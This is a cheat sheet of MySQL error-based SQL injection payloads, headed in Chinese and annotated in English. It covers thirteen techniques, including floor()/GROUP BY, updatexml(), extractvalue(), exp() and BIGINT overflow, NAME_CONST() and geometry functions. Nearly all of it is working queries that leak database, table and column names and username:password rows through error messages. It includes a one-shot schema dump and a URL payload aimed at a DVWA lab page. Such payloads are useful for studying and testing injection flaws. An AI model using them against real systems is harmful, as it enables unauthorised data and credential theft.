MySQL 常见报错注入函数
1. floor()
获取数据库
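-- Current database name via the floor()/GROUP BY duplicate-key error.
-- rand(0) is seeded, so floor(rand(0)*2) yields 0,1,1,0,1,1,... and GROUP BY hits a
-- duplicate key on the 3rd row every time; the unseeded rand() used before only errored
-- sometimes and had to be retried. information_schema.tables always has >= 3 rows.
-- The leaked value rides in "Duplicate entry ':<db>:1' for key 'group_key'".
mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand(0)*2))) name from information_schema.tables group by name;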
获取表名
-- Table names of the current DB; advance the limit offset (3,1 -> 4,1 ...) one row per request.
mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取字段名
-- Column names of a known table ('users'); walk them with the limit offset.
mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
获取内容
-- Row data: the selected value becomes part of the duplicate GROUP BY key echoed in the error.
mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
2. UpdateXml()
获取表名
-- updatexml(): 0x7e ('~') makes the 2nd argument an invalid XPath expression, so the server
-- echoes it as "XPATH syntax error: '~<value>'". Only 32 characters are shown; use substr()
-- on the subquery to page through longer values.
mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);
获取字段
-- Column names of 'users' via the same XPath syntax error; walk with the limit offset.
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
获取内容
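-- Row data (the original line here repeated the column-name query by mistake, so it
-- never returned any content). 0x7e ('~') makes the XPath invalid and the row is
-- echoed in "XPATH syntax error"; only 32 characters show, so use substr() for
-- longer username:password pairs.
mysql> select updatexml(0,concat(0x7e,(SELECT concat(username,0x3a,password) FROM users limit 0,1)),0);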
3. exp()
-- exp() overflow: ~ casts the subquery string to integer 0 and inverts it to 18446744073709551615;
-- exp() of that is out of DOUBLE range and the error text quotes the subquery's value.
-- Needs MySQL 5.5.5 or later; whether newer servers still echo the value in the message
-- varies, so verify against the target version first.
and exp(~(select * from (select user() ) a) );
得到表名
-- Table name of the current DB leaked through the exp() DOUBLE overflow error.
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
得到列名
-- Column name of 'users' leaked through the exp() DOUBLE overflow error.
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
检索数据
-- One row of users as id:username:password; the error message carries the concatenated string.
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
一蹴而就(一次性取出当前库所有的 库名::表名::列名)
-- One-shot schema dump: @ is a user variable with an empty name. Inside count(*) it is
-- appended with "\n<schema>::<table>::<column>" for every column of the current DB, and
-- the finished string is leaked through the exp() overflow error. Very long output may
-- be cut by the server's error-message length; fall back to the per-row queries above if so.
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
4. extractvalue() (报错回显有长度限制,最长 32 个字符;updatexml() 同样受此限制,超长内容需用 substr()/mid() 分段读取)
获取表名
-- extractvalue(): 0x5c ('\') makes the XPath invalid and the table name is echoed in
-- "XPATH syntax error: '\<table>'". 32-character limit applies; page with substr().
mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));
获取字段
-- One password value (second row) via the same XPath syntax error; hashes longer than
-- 32 characters must be read in pieces with substr().
mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));
5. NAME_CONST()
-- NAME_CONST(): two columns named after PAYLOAD's value collide, so the server errors with
-- "Duplicate column name '<value>'". Both NAME_CONST arguments must be constants, so
-- PAYLOAD is something like version(); a subquery fails with "Incorrect arguments to NAME_CONST".
-- '+' stands for URL-encoded spaces.
`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`
6. bigint()
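-- BIGINT overflow: !(...) casts the subquery string to 0 and negates it to 1; ~0 is the
-- bitwise NOT of 0, i.e. 18446744073709551615, so 1 - ~0 leaves the BIGINT UNSIGNED range
-- and the error message quotes the subquery's value. The operator between the subquery
-- and ~0 is a plain minus sign (it was annotated inline in the original, which broke the
-- statement). Needs MySQL 5.5.5 or later.
select !(select * from (select user())x) - ~0;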
bigint 溢出的原理可参考文章:http://www.cnblogs.com/lcamry/articles/5509112.html
7. join()
-- Self-join column enumeration: selecting * from a table joined to itself produces
-- duplicate column names, and the derived table rejects the first one with
-- "Duplicate column name '<col>'". Each column already learned goes into using(...)
-- so the next error names the following column. mysql.user needs privileges; swap in
-- the target table.
`select * from(select * from mysql.user a join mysql.user b using(Host))c;(爆列名贼好用)`
8. geometrycollection()
-- Geometry constructors: a subquery result is not a geometry, so parsing fails with
-- "Illegal non geometric '(select ...)' value found during parsing", echoing the value.
-- Version-dependent; verify on the target server.
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
9. multipoint()
-- multipoint(): same "Illegal non geometric ... value found during parsing" error echoing the subquery result.
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
10. polygon()
-- polygon(): same "Illegal non geometric ... value found during parsing" error echoing the subquery result.
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
11. multipolygon()
-- multipolygon(): same "Illegal non geometric ... value found during parsing" error echoing the subquery result.
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
12. linestring()
-- linestring(): same "Illegal non geometric ... value found during parsing" error echoing the subquery result.
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
13. multilinestring()
-- multilinestring(): same "Illegal non geometric ... value found during parsing" error echoing the subquery result.
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));